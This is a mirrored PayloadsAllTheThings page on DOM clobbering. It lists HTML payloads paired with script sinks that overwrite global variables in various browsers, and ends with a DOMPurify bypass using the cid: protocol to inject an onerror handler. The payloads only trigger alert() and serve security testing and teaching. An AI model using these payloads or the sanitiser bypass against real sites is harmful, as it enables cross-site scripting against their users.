mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
3.7 KiB
3.7 KiB
Dom Clobbering
DOM Clobbering is a technique where global variables can be overwritten or "clobbered" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities.
Summary
Lab
- Lab: Exploiting DOM clobbering to enable XSS
- Lab: Clobbering DOM attributes to bypass HTML filters
- Lab: DOM clobbering test case protected by CSP
Exploit
Exploitation requires any kind of HTML injection
in the page.
-
Clobbering
x.y.value
// Payload <form id=x><output id=y>I've been clobbered</output> // Sink <script>alert(x.y.value);</script>
-
Clobbering
x.y
using ID and name attributes together to form a DOM collection// Payload <a id=x><a id=x name=y href="Clobbered"> // Sink <script>alert(x.y)</script>
-
Clobbering
x.y.z
- 3 levels deep// Payload <form id=x name=y><input id=z></form> <form id=x></form> // Sink <script>alert(x.y.z)</script>
-
Clobbering
a.b.c.d
- more than 3 levels// Payload <iframe name=a srcdoc=" <iframe srcdoc='<a id=c name=d href=cid:Clobbered>test</a><a id=c>' name=b>"></iframe> <style>@import '//portswigger.net';</style> // Sink <script>alert(a.b.c.d)</script>
-
Clobbering
forEach
(Chrome only)// Payload <form id=x> <input id=y name=z> <input id=y> </form> // Sink <script>x.y.forEach(element=>alert(element))</script>
-
Clobbering
document.getElementById()
using<html>
or<body>
tag with the sameid
attribute// Payloads <html id="cdnDomain">clobbered</html> <svg><body id=cdnDomain>clobbered</body></svg> // Sink <script> alert(document.getElementById('cdnDomain').innerText);//clobbbered </script>
-
Clobbering
x.username
// Payload <a id=x href="ftp:Clobbered-username:Clobbered-Password@a"> // Sink <script> alert(x.username)//Clobbered-username alert(x.password)//Clobbered-password </script>
-
Clobbering (Firefox only)
// Payload <base href=a:abc><a id=x href="Firefox<>"> // Sink <script> alert(x)//Firefox<> </script>
-
Clobbering (Chrome only)
// Payload <base href="a://Clobbered<>"><a id=x name=x><a id=x name=xyz href=123> // Sink <script> alert(x.xyz)//a://Clobbered<> </script>
Tricks
- DomPurify allows the protocol
cid:
, which doesn't encode double quote ("
):<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//">